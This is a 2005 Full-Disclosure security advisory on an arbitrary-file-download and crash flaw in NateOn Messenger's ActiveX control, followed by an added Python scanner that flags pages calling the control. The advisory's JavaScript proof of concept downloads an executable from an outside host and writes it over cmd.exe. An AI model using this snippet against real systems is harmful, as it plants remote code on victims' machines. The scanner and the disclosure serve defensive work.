[Full-disclosure] [NRVA05-08] - Arbitrary file download by NateOn Messenger's ActiveX and DoS

From: saintlinu (saintlinu_at_yahoo.co.kr)
Date: 09/29/05

    To: <bugtraq@securityfocus.com>, <vulnwatch@vulnwatch.org>, <full-disclosure@lists.grok.org.uk>
    Date: Thu, 29 Sep 2005 11:36:27 +0800
    
    
    

    Title: Arbitrary File Download by NateOn Messenger's ActiveX and DoS

    Discoverer: PARK, GYU TAE (saintlinu@null2root.org)

    Advisory No.: NRVA05-08

    Critical: Moderately Critical

    Impact: Arbitrary file download by NateOn Messenger's ActiveX and DoS

    Where: From remote

    Operating System: Windows Only

    Solution: Not patched yet

    Workaround: N/A

     

    Notice: 09. 17. 2005 Initial notification

            09. 23. 2005 2nd notification

            09. 27. 2005 3rd notification

            09. 29. 2005 Vendor didn't respond. Vulnerability disclosed

     

    Description:

    NateOn Messenger (see NRVA05-02) is an Internet instant messenger, like
    MSN, Yahoo and so on.

    If NateOn Messenger is installed, it can be exploited through the
    'NateonDownloadManager.ocx' ActiveX control, which downloads a remote
    file to a caller-chosen local path.

    There is also another vulnerability, which looks like a buffer overflow
    when an overly long destination string is passed.

    See the following details:

    Not the complete code, only a piece of it:

     

    <--snip-->

                 i = GotNate.IsNateonInstall();

                 if( i == 1 ) {
                     alert('NateOn Messenger already installed. Do Attack ...');

                     // for a second-order attack, try
                     i = GotNate.Excute("1", 'http://saintlinu.null2root.org/gotit.exe', 'c:\\windows\\system32\\cmd.exe');

                     // to crash the victim's system, try
                     i = GotNate.Excute("1", 'http://saintlinu.null2root.org/gotit.exe', 'very_long_strings_in_here');
                 } else {
                     alert('NateOn Messenger NOT Installed');
                 }

    </--snip-->
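    A content check that a web proxy or filter could run against pages that script this control, written here as an added example (it is not part of the advisory and not the author's code): it locates `Excute(...)` calls by their three string arguments and flags a remote download source, a destination under the Windows directory, and an oversized destination string of the kind the advisory says crashes the client. The sample page is constructed, the download host is a placeholder, and the 256-character length threshold is an assumption, since the advisory only says "very long strings".

```python
import re

# Constructed sample page fragment in the shape the advisory describes: a script
# that probes for the control and then calls Excute(). The host name is a
# placeholder and the page is not the advisory's own.
SAMPLE_PAGE = r"""
<script type="text/javascript">
  var i = GotNate.IsNateonInstall();
  if (i == 1) {
    i = GotNate.Excute("1", 'http://example.invalid/gotit.exe', 'c:\\windows\\system32\\cmd.exe');
    i = GotNate.Excute("1", 'http://example.invalid/gotit.exe', 'LONGSTR');
  }
</script>
""".replace("LONGSTR", "A" * 300)

# One JS string literal, single- or double-quoted, with backslash escapes allowed.
_JS_STR = r"""(?:"(?:[^"\\]|\\.)*"|'(?:[^'\\]|\\.)*')"""

# <object>.Excute(<str>, <str>, <str>), the call shape shown in the advisory.
EXCUTE_CALL = re.compile(
    r"\.\s*Excute\s*\(\s*(" + _JS_STR + r")\s*,\s*(" + _JS_STR + r")\s*,\s*("
    + _JS_STR + r")\s*\)",
    re.IGNORECASE,
)

# Names that show a page is touching the NateOn control at all (from the advisory).
CONTROL_HINTS = ("NateonDownloadManager", "IsNateonInstall")

# Assumed threshold: the advisory only says "very long strings" crash the client.
LONG_ARG_THRESHOLD = 256


def _unquote(literal):
    """Strip the quotes of a JS string literal and collapse backslash escapes."""
    return re.sub(r"\\(.)", r"\1", literal[1:-1])


def classify_call(mode, source, destination, long_threshold=LONG_ARG_THRESHOLD):
    """Return the reasons a single Excute() call looks dangerous (empty if none)."""
    reasons = []
    if re.match(r"(?:https?|ftp)://", source, re.IGNORECASE):
        reasons.append("remote-download")          # fetches a file from the network
    if destination.lower().startswith("c:\\windows"):
        reasons.append("system-directory-target")  # writes into the OS directory
    if len(destination) >= long_threshold:
        reasons.append("oversized-path")           # the DoS condition from the advisory
    return reasons


def scan_page(html, long_threshold=LONG_ARG_THRESHOLD):
    """Find every Excute() call in an HTML/JS document and classify it."""
    findings = []
    for m in EXCUTE_CALL.finditer(html):
        mode, source, destination = (_unquote(g) for g in m.groups())
        findings.append({
            "offset": m.start(),
            "mode": mode,
            "source": source,
            "destination_length": len(destination),
            "reasons": classify_call(mode, source, destination, long_threshold),
        })
    return findings


def mentions_control(html):
    """True if the page references the control or its install probe by name."""
    lowered = html.lower()
    return any(hint.lower() in lowered for hint in CONTROL_HINTS)


if __name__ == "__main__":
    print("control referenced:", mentions_control(SAMPLE_PAGE))
    for finding in scan_page(SAMPLE_PAGE):
        print(finding)
```

    Run stand-alone it reports two calls for the constructed page, the first flagged for a remote download into the Windows directory and the second for the oversized destination string. The destination itself is deliberately not stored in the finding, only its length, so a long crash string does not end up in the alert payload.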


    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.grok.org.uk/full-disclosure-charter.html
    Hosted and sponsored by Secunia - http://secunia.com/
